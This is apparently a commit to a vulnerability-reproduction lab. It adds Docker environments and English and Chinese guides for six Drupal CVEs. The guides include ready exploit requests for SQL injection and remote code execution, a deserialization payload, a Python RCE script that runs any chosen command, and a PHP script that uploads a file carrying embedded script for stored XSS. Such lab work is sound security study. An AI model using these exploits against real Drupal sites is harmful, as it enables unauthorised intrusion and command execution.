first commit

drupal/CVE-2014-3704/README.md

@@ -0,0 +1,52 @@
+# Drupal < 7.32 "Drupalgeddon" SQL Injection (CVE-2014-3704)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License.
+
+The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
+
+References:
+
+- <https://www.drupal.org/SA-CORE-2014-005>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704>
+
+## Vulnerable Environment
+
+Execute the following command to start a Drupal 7.31.
+
+```
+docker compose up -d
+```
+
+After the server is started, browse ``http://your-ip:8080`` to see the Drupal installation wizard, and use the default configuration to install it.
+
+Note that the Mysql database name is ``drupal``, the database username and password is ``root``, and the address is ``mysql``:
+
+![](1.png)
+
+After the installation is complete, browse the home page.
+
+![](2.png)
+
+## POC
+
+The SQL injection does not require authentication and can execute malicious SQL statements by sending the following request.
+
+```
+POST /?q=node&destination=node HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 120
+
+pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
+```
+
+As can be seen, the SQL statement reports an error message with user data.
+
+![](3.png)

drupal/CVE-2014-3704/README.zh-cn.md

@@ -0,0 +1,50 @@
+# Drupal < 7.32 "Drupalgeddon" SQL注入漏洞（CVE-2014-3704）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架，在GNU通用公共许可证下分发。
+
+在Drupal Core 7.32版本之前的7.x版本中，数据库抽象API中的expandArguments函数没有正确构造预处理语句，这允许远程攻击者通过包含精心构造的键的数组进行SQL注入攻击。
+
+参考链接：
+
+- <https://www.drupal.org/SA-CORE-2014-005>
+- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704>
+
+## 环境搭建
+
+执行如下命令启动一个Drupal 7.31服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080`将会看到Drupal的安装向导，使用默认配置进行安装。
+
+注意：MySQL数据库名为`drupal`，数据库用户名和密码均为`root`，地址为`mysql`：
+
+![](1.png)
+
+安装完成后，即可访问首页：
+
+![](2.png)
+
+## 漏洞复现
+
+该SQL注入漏洞无需身份认证，可以通过发送以下请求来执行恶意SQL语句：
+
+```
+POST /?q=node&destination=node HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 120
+
+pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
+```
+
+如图所示，SQL语句报错信息中包含了用户数据：
+
+![](3.png)

drupal/CVE-2014-3704/docker-compose.yml

@@ -0,0 +1,12 @@
+services:
+ web:
+   image: vulhub/drupal:7.31
+   depends_on:
+    - mysql
+   ports:
+    - "8080:80"
+ mysql:
+   image: mysql:5.5
+   environment: 
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=drupal

drupal/CVE-2017-6920/README.md

@@ -0,0 +1,40 @@
+# Drupal Core 8 PECL YAML Deserialization Remote Code Execution (CVE-2017-6920)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP.
+
+A remote code execution vulnerability exists in Drupal 8.x through 8.3.4 when using the PECL YAML parser. The vulnerability is caused by unsafe deserialization of YAML content, allowing attackers to execute arbitrary code.
+
+References:
+
+- <https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-06-21/drupal-core-multiple>
+- <https://paper.seebug.org/334/>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Drupal 8.3.0 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/` to access the Drupal installation page. Follow the default configuration steps to complete the installation. Since there is no MySQL environment, you can choose SQLite as the database.
+
+## Vulnerability Reproduction
+
+To reproduce this vulnerability, first log in to the Drupal site with administrator credentials. Once logged in, navigate to the configuration import page at `http://127.0.0.1:8080/admin/config/development/configuration/single/import`.
+
+Select "Simple configuration" for Configuration type, enter any name for Configuration name, and paste the following PoC in "Paste your configuration here":
+
+```php
+!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
+```
+
+![1](1.png)
+
+Click "Import" and you will see the vulnerability has been successfully triggered, displaying the phpinfo page:
+
+![2](2.png)
+
+> Note: Although official CPE information indicates this vulnerability exists since version 8.0.0, our testing shows it can only be reproduced in Drupal 8.3.0, not in 8.0.0.

drupal/CVE-2017-6920/README.zh-cn.md

@@ -0,0 +1,38 @@
+# Drupal Core 8 PECL YAML反序列化远程代码执行漏洞（CVE-2017-6920）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在使用PECL YAML解析器的Drupal 8.x至8.3.4版本中存在远程代码执行漏洞。该漏洞是由于YAML内容的不安全反序列化导致的，允许攻击者执行任意代码。
+
+参考链接：
+
+- <https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2017-06-21/drupal-core-multiple>
+- <https://paper.seebug.org/334/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.3.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。按照默认配置完成安装步骤。由于环境中没有MySQL，可以选择SQLite作为数据库。
+
+## 漏洞复现
+
+首先，以管理员身份登录Drupal站点。然后，访问`http://127.0.0.1:8080/admin/config/development/configuration/single/import`页面。
+
+在Configuration type中选择"Simple configuration"，Configuration name可以任意填写，在"Paste your configuration here"中粘贴以下PoC：
+
+```php
+!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
+```
+
+![1](1.png)
+
+点击"Import"后，你将看到漏洞已成功触发，显示phpinfo页面：
+
+![2](2.png)
+
+> 注意：虽然官方CPE信息显示该漏洞从8.0.0版本就存在，但我们的测试表明只能在Drupal 8.3.0中复现，而在8.0.0中无法复现。

drupal/CVE-2017-6920/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:8.3.0
+   ports:
+    - "8080:80"

drupal/CVE-2018-7600/README.md

@@ -0,0 +1,42 @@
+# Drupal Drupalgeddon 2 Unauthenticated Remote Code Execution (CVE-2018-7600)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations including the Form API.
+
+References:
+
+- <https://www.drupal.org/sa-core-2018-002>
+- <https://research.checkpoint.com/uncovering-drupalgeddon-2/>
+
+## Vulnerable environment
+
+Run the following command to start a vulnerable Drupal 8.5.0 environment:
+
+```
+docker compose up -d
+```
+
+After the environment is started, visit `http://your-ip:8080/` and you will see the drupal installation page. Complete the drupal installation using the "standard" profile. Because there is no mysql environment, you should select sqlite database when installing. Once the installation is complete you are ready to start exploiting it.
+
+## Exploit
+
+Referring to [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py), we can send the following request to drupal:
+
+```
+POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
+```
+
+Upon successful execution of the code, the id command is executed:
+
+![](1.png)

drupal/CVE-2018-7600/README.zh-cn.md

@@ -0,0 +1,42 @@
+# Drupal Drupalgeddon 2 未授权远程代码执行漏洞（CVE-2018-7600）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 7.58之前的版本、8.3.9之前的8.x版本、8.4.6之前的8.4.x版本和8.5.1之前的8.5.x版本中存在远程代码执行漏洞。该漏洞影响了多个具有默认或常见模块配置的子系统，包括Form API。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2018-002>
+- <https://research.checkpoint.com/uncovering-drupalgeddon-2/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.5.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。使用"标准"配置文件完成Drupal安装。由于环境中没有MySQL，安装时应选择SQLite数据库。安装完成后，即可开始漏洞利用。
+
+## 漏洞复现
+
+参考[a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py)，我们可以向Drupal发送以下请求：
+
+```
+POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
+Host: your-ip:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 103
+
+form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
+```
+
+代码执行成功后，id命令将被执行：
+
+![](1.png)

drupal/CVE-2018-7600/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:8.5.0
+   ports:
+    - "8080:80"

drupal/CVE-2018-7602/README.md

@@ -0,0 +1,39 @@
+# Drupal Drupalgeddon 3 Authenticated Remote Code Execution (CVE-2018-7602)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP.
+
+A remote code execution vulnerability exists in Drupal 7.x and 8.x. The vulnerability is caused by insufficient input sanitization, where double URL encoding of the '#' character can bypass the sanitize() function filter, leading to remote code execution.
+
+References:
+
+- <https://www.drupal.org/sa-core-2018-004>
+- <https://github.com/pimps/CVE-2018-7600>
+- <https://github.com/kastellanos/CVE-2018-7602>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Drupal 7.57 server:
+
+```bash
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/` to access the Drupal installation page. Follow the default configuration steps to complete the installation. Since there is no MySQL environment, you can choose SQLite as the database.
+
+Remember the username and password of the account you created during the installation, because you will need it to exploit the vulnerability.
+
+## Vulnerability Reproduction
+
+Using the PoC from [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py), execute the following command to exploit the vulnerability:
+
+```bash
+# Replace "id" with the command you want to execute
+# First "drupal" is your username, second "drupal" is your password
+python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8080/
+```
+
+As shown in the red box in the image below, the command is successfully executed:
+
+![](1.png)

drupal/CVE-2018-7602/README.zh-cn.md

@@ -0,0 +1,37 @@
+# Drupal Drupalgeddon 3 后台远程代码执行漏洞（CVE-2018-7602）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 7.x和8.x版本中存在远程代码执行漏洞。该漏洞是由于输入过滤不充分，通过对URL中的'#'字符进行两次URL编码可以绕过sanitize()函数过滤，从而导致远程代码执行。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2018-004>
+- <https://github.com/pimps/CVE-2018-7600>
+- <https://github.com/kastellanos/CVE-2018-7602>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 7.57服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8081/`将会看到Drupal的安装页面。按照默认配置完成安装步骤。由于环境中没有MySQL，可以选择SQLite作为数据库。
+
+安装过程中，请记住你创建的账户信息，因为需要用它来利用漏洞。
+
+## 漏洞复现
+
+使用来自[pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600/blob/master/drupa7-CVE-2018-7602.py)的PoC，执行以下命令来利用漏洞：
+
+```
+# 将"id"替换为你想执行的命令
+# 第一个"drupal"是用户名，第二个"drupal"是密码
+python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://127.0.0.1:8081/
+```
+
+如下图红框所示，命令成功执行：
+
+![](1.png)

drupal/CVE-2018-7602/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:7.57
+   ports:
+    - "8080:80"

drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py

@@ -0,0 +1,79 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+def get_args():
+  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
+                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
+                    epilog= '''
+                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
+                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
+                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
+                    ''')
+
+  parser.add_argument("user", help="Username")
+  parser.add_argument("password", help="Password")
+  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
+  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
+  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
+  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
+  args = parser.parse_args()
+  return args
+
+def pwn_target(target, username, password, function, command, proxy):
+  requests.packages.urllib3.disable_warnings()
+  session = requests.Session()
+  proxyConf = {'http': proxy, 'https': proxy}
+  try:
+    print('[*] Creating a session using the provided credential...')
+    get_params = {'q':'user/login'}
+    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}
+    print('[*] Finding User ID...')
+    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+    get_params = {'q':'user'}
+    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')
+    if ("?q=" in user_id):
+      user_id = user_id.split("=")[1]
+    if(user_id):
+      print('[*] User ID found: ' + user_id)
+    print('[*] Poisoning a form using \'destination\' and including it in cache.')
+    get_params = {'q': user_id + '/cancel'}
+    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
+    form_token = form.find('input', {'name': 'form_token'}).get('value')
+    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
+    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}
+    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+    soup = BeautifulSoup(r.text, "html.parser")
+    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
+    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
+    if form_build_id:
+        print('[*] Poisoned form ID: ' + form_build_id)
+        print('[*] Triggering exploit to execute: ' + command)
+        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
+        post_params = {'form_build_id':form_build_id}
+        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
+        parsed_result = r.text.split('[{"command":"settings"')[0]
+        print(parsed_result)
+  except:
+    print("ERROR: Something went wrong.")
+    raise
+
+def main():
+  print ()
+  print ('===================================================================================')
+  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
+  print ('|                                   by pimps                                      |')
+  print ('===================================================================================\n')
+
+  args = get_args() # get the cl args
+  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())
+
+
+if __name__ == '__main__':
+  main()

drupal/CVE-2019-6339/README.md

@@ -0,0 +1,41 @@
+# Drupal Remote Code Execution by phar deserialization (CVE-2019-6339)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP.
+
+A remote code execution vulnerability exists in Drupal 7.x before 7.62, Drupal 8.5.x before 8.5.9 and 8.6.x before 8.6.6. The vulnerability is caused by improper handling of PHAR deserialization in the file system service, which can lead to remote code execution.
+
+References:
+
+- <https://www.drupal.org/sa-core-2019-002>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Drupal 8.5.0 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/` to access the Drupal installation page. Follow the default configuration steps to complete the installation. Since there is no MySQL environment, you can choose SQLite as the database.
+
+## Vulnerability Reproduction
+
+First, log in as an administrator and upload an avatar. The avatar image should be a specially crafted PoC file (you can refer to [thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal) for the PoC):
+
+![1](1.png)
+
+By default, Drupal stores uploaded images in the `/sites/default/files/pictures/<YYYY-MM>/` directory and keeps their original filenames. This information is important for exploiting the vulnerability.
+
+Visit `http://127.0.0.1:8080/admin/config/media/file-system` and enter the path to the previously uploaded image in the "Temporary directory" field. For example:
+
+```
+phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg
+```
+
+Save the configuration to trigger the vulnerability. The successful exploitation will be confirmed by the execution of the malicious code:
+
+![2](2.png)

drupal/CVE-2019-6339/README.zh-cn.md

@@ -0,0 +1,39 @@
+# Drupal远程代码执行漏洞（CVE-2019-6339）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中存在远程代码执行漏洞。该漏洞是由于文件系统服务中PHAR反序列化处理不当导致的，可以导致远程代码执行。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2019-002>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.5.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。按照默认配置完成安装步骤。由于环境中没有MySQL，可以选择SQLite作为数据库。
+
+## 漏洞复现
+
+首先，以管理员身份登录并上传头像。头像图片需要是特制的PoC文件（可以参考[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)获取PoC）：
+
+![1](1.png)
+
+Drupal默认将上传的图片存储在`/sites/default/files/pictures/<YYYY-MM>/`目录下，并保留其原始文件名。这个信息对于漏洞利用很重要。
+
+访问`http://127.0.0.1:8080/admin/config/media/file-system`，在"临时目录"字段中输入之前上传的图片路径，例如：
+
+```
+phar://./sites/default/files/pictures/2019-06/blog-ZDI-CAN-7232-cat_0.jpg
+```
+
+保存配置以触发漏洞。恶意代码的执行将证实漏洞利用成功：
+
+![2](2.png)

drupal/CVE-2019-6339/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/drupal:8.5.0
+   ports:
+    - "8080:80"

drupal/CVE-2019-6341/README.md

@@ -0,0 +1,47 @@
+# Drupal Cross-Site Scripting by File Upload (CVE-2019-6341)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Drupal is a free and open-source web content management framework written in PHP.
+
+A cross-site scripting (XSS) vulnerability exists in Drupal 7.x before 7.65, Drupal 8.x before 8.5.14 and 8.6.x before 8.6.13. The vulnerability is caused by improper handling of file uploads in the file module or subsystem, which can lead to stored XSS attacks.
+
+References:
+
+- <https://www.drupal.org/sa-core-2019-004>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable Drupal 8.5.0 server:
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080/` to access the Drupal installation page. Follow the default configuration steps to complete the installation. Since there is no MySQL environment, you can choose SQLite as the database.
+
+## Vulnerability Reproduction
+
+This vulnerability exploits a flaw in Drupal's file module that allows uploading a specially crafted file without extension. The file appears to be an image but actually contains HTML code with embedded JavaScript. When other users visit the link to this file, the XSS payload will be executed.
+
+By default, Drupal stores uploaded images in the `/sites/default/files/pictures/<YYYY-MM>/` directory.
+
+To exploit the vulnerability, use the PoC script from [thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal) to create and upload a malicious GIF file. Execute the following command, where the first argument is the target IP and the second is the target port:
+
+```
+php cve-2019-6341-exp.php 192.168.11.1 8080
+```
+
+![1](1.png)
+
+After successful upload, visiting the image location will trigger the XSS vulnerability:
+
+![2](2.png)
+
+Note:
+
+1. Chrome and Firefox browsers have built-in XSS filters, so it's recommended to use Edge or IE browsers for testing.
+2. The uploaded image name ends with "_0" due to Drupal's rule mechanism. For more details, see [Drupal 1-click to RCE Analysis](https://paper.seebug.org/897/)
+3. The chain of this bug and [CVE-2019-6339](../CVE-2019-6339/README.md), which can lead to remote code execution by 1 click

drupal/CVE-2019-6341/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Drupal文件上传导致跨站脚本执行（CVE-2019-6341）
+
+Drupal是一个使用PHP编写的免费开源的Web内容管理框架。
+
+在Drupal 7.x < 7.65, Drupal 8.x < 8.5.14 和 8.6.x < 8.6.13 中，由于文件模块或子系统中对文件上传处理不当，导致攻击者可以上传一个没有扩展名的文件，该文件表面上是一个图片，但实际包含了嵌入JavaScript的HTML代码。当其他用户访问该文件的链接时，XSS代码将被执行。
+
+参考链接：
+
+- <https://www.drupal.org/sa-core-2019-004>
+- <https://www.zerodayinitiative.com/blog/2019/4/11/a-series-of-unfortunate-images-drupal-1-click-to-rce-exploit-chain-detailed>
+- <https://paper.seebug.org/897/>
+
+## 环境搭建
+
+执行如下命令启动一个存在漏洞的Drupal 8.5.0服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/`将会看到Drupal的安装页面。按照默认配置完成安装步骤。由于环境中没有MySQL，可以选择SQLite作为数据库。
+
+## 漏洞复现
+
+该漏洞利用了Drupal文件模块中的一个缺陷，允许上传特制的文件。该文件表面上是一个图片，但实际包含了嵌入JavaScript的HTML代码。当其他用户访问该文件的链接时，XSS代码将被执行。
+
+Drupal默认将上传的图片存储在`/sites/default/files/pictures/<YYYY-MM>/`目录下，并保留其原始文件名。
+
+要利用此漏洞，使用来自[thezdi/PoC](https://github.com/thezdi/PoC/tree/master/Drupal)的PoC脚本创建并上传恶意GIF文件。执行以下命令，其中第一个参数是目标IP，第二个参数是目标端口：
+
+```
+php cve-2019-6341-exp.php 192.168.11.1 8080
+```
+
+![1](1.png)
+
+上传成功后，访问图片位置即可触发XSS漏洞：
+
+![2](2.png)
+
+注意：
+
+1. Chrome和Firefox浏览器内置了XSS过滤器，建议使用Edge或IE浏览器进行测试。
+2. 上传的图片名称末尾带有"_0"是由于Drupal的规则机制。详细信息请参见[Drupal 1-click to RCE分析](https://paper.seebug.org/897/)
+3. 该漏洞与[CVE-2019-6339](../CVE-2019-6339/README.md)形成漏洞利用链，管理员只需点击一个恶意链接即可导致远程代码执行

drupal/CVE-2019-6341/blog-poc.php

@@ -0,0 +1,146 @@
+<?php
+/*
+usage: php poc.php <target-ip>
+
+Date: 1 March 2019
+Exploit Author: TrendyTofu
+Original Discoverer: Sam Thomas
+Version: <= Drupal 8.6.2
+Tested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.
+Tested not wokring on: Drupal running on MacOS with APFS
+CVE : CVE-2019-6341
+Reference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/
+
+*/
+
+$host = $argv[1];
+$port = $argv[2];
+
+$pk =   "GET /user/register HTTP/1.1\r\n".
+	"Host: ".$host."\r\n".
+	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
+	"Accept-Language: en-US,en;q=0.5\r\n".
+	"Referer: http://".$host."/user/login\r\n".
+	"Connection: close\r\n\r\n";
+
+$fp = fsockopen($host,$port,$e,$err,1);
+if (!$fp) {die("not connected");}
+fputs($fp,$pk);
+$out="";
+while (!feof($fp)){
+  $out.=fread($fp,1);
+}
+fclose($fp);
+
+preg_match('/name="form_build_id" value="(.*)"/', $out, $match);
+$formid = $match[1];
+//var_dump($formid);
+//echo "form id is:". $formid;
+//echo $out."\n";
+sleep(1);
+
+$data = 
+"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\r\n".
+"Connection: close\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"mail\"\r\n".
+"\r\n".
+"test324@example.com\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"name\"\r\n".
+"\r\n".
+"test2345\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"files[user_picture_0]\"; filename=\"xxx\xc0.gif\"\r\n".
+"Content-Type: image/gif\r\n".
+"\r\n".
+"GIF\r\n".
+"<HTML>\r\n".
+"	<HEAD>\r\n".
+"		<SCRIPT>alert(123);</SCRIPT>\r\n".
+"	</HEAD>\r\n".
+"	<BODY>\r\n".
+"	</BODY>\r\n".
+"</HTML>\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n".
+"\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"form_build_id\"\r\n".
+"\r\n".
+//"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\r\n".
+$formid."\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"form_id\"\r\n".
+"\r\n".
+"user_register_form\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"contact\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"timezone\"\r\n".
+"\r\n".
+"America/New_York\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_triggering_element_name\"\r\n".
+"\r\n".
+"user_picture_0_upload_button\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_triggering_element_value\"\r\n".
+"\r\n".
+"Upload\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"_drupal_ajax\"\r\n".
+"\r\n".
+"1\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[theme]\"\r\n".
+"\r\n".
+"bartik\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[theme_token]\"\r\n".
+"\r\n".
+"\r\n".
+"-----------------------------60928216114129559951791388325\r\n".
+"Content-Disposition: form-data; name=\"ajax_page_state[libraries]\"\r\n".
+"\r\n".
+"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\r\n".
+"-----------------------------60928216114129559951791388325--\r\n";
+
+$pk = 	"POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n".
+	"Host: ".$host."\r\n".
+	"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n".
+	"Accept: application/json, text/javascript, */*; q=0.01\r\n".
+	"Accept-Language: en-US,en;q=0.5\r\n".
+	"X-Requested-With: XMLHttpRequest\r\n".
+	"Referer: http://" .$host. "/user/register\r\n".
+	"Content-Length: ". strlen($data). "\r\n".
+	$data;
+
+echo "uploading file, please wait...\n";
+
+for ($i =1; $i <= 2; $i++){
+$fp = fsockopen($host,$port,$e,$err,1);
+if (!$fp) {die("not connected");}
+fputs($fp,$pk);
+$out="";
+while (!feof($fp)){
+  $out.=fread($fp,1);
+}
+fclose($fp);
+
+// echo "Got ".$i."/2 500 errors\n";
+// echo $out."\n";
+sleep(1);
+}
+
+echo "please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\n";
+
+?>

drupal/CVE-2019-6341/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
